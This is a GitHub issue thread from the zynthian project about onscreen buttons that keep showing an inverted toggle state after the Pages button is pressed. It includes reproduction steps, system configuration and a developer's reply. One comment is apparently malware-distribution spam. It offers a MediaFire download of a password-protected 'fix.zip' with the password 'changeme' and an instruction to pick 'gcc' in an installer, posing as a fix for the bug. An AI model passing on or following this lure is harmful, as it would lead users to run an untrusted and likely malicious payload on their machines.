### ISSUE TITLE
Onscreen buttons show wrong toggle status

### ISSUE THREAD

**Issue by riban-bw** [zynthian/zynthian-issue-tracking#1182]
# Describe the issue
A recent change to onscreen buttons added a visual indication of their toggle status. This can show the wrong status.
# To Reproduce
## Steps to reproduce the behavior:
1. Enable touch navigation.
2. Go to chain control view
3. Press "Pages" button.
4. Select a page from the list or press BACK
 ## Expected behaviour
Pages button reverts to normal colour.
## Actual behaviour
Pages button remains inverted.
# Additional context
I don't think this is a particularly useful feature but if it is to be retained, it should update the state of buttons dynamically. This could use event queue (see tempo screen) or refresh polling.

# Configuration
## Hardware
```
Raspberry Pi 4 Model B Rev 1.5
Audio: V5 ADAC
Display: MIPI DSI 800x480 (inverted)
Wiring: V5
I2C: MCP23017@0x20, MCP23017@0x21
Profile: v5
```
## System
```
Debian GNU/Linux 12 (bookworm)
Build Date: 2024-02-01
Memory: 38% (1446M/3792M)
SD Card: 95% (26G/29G)
Temperature: 51.1ºC
Overclock: Maximum
```
## MIDI & UI
```
Tuning: 440 Hz
Master Channel: Off
Preload Presets: Off
ZS3 (SubSnapShots): On
Power Save: 10 minutes
Audio Levels on Snapshots: On
```
## Software
```
zyncoder: oram (62626a8) 
zynthian-ui: oram (00491a9)
zynthian-sys: oram (c4f12ea)
zynthian-data: oram (e222e11)
zynthian-webconf: oram (b70f1bc)
```

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jofemodo** [comment]
It works for the ALT button. The problem with the Page button is due to the refered execution of the zynswitch CUIA. I tried to delay the execution of the status update code, but it doesn't work very well.
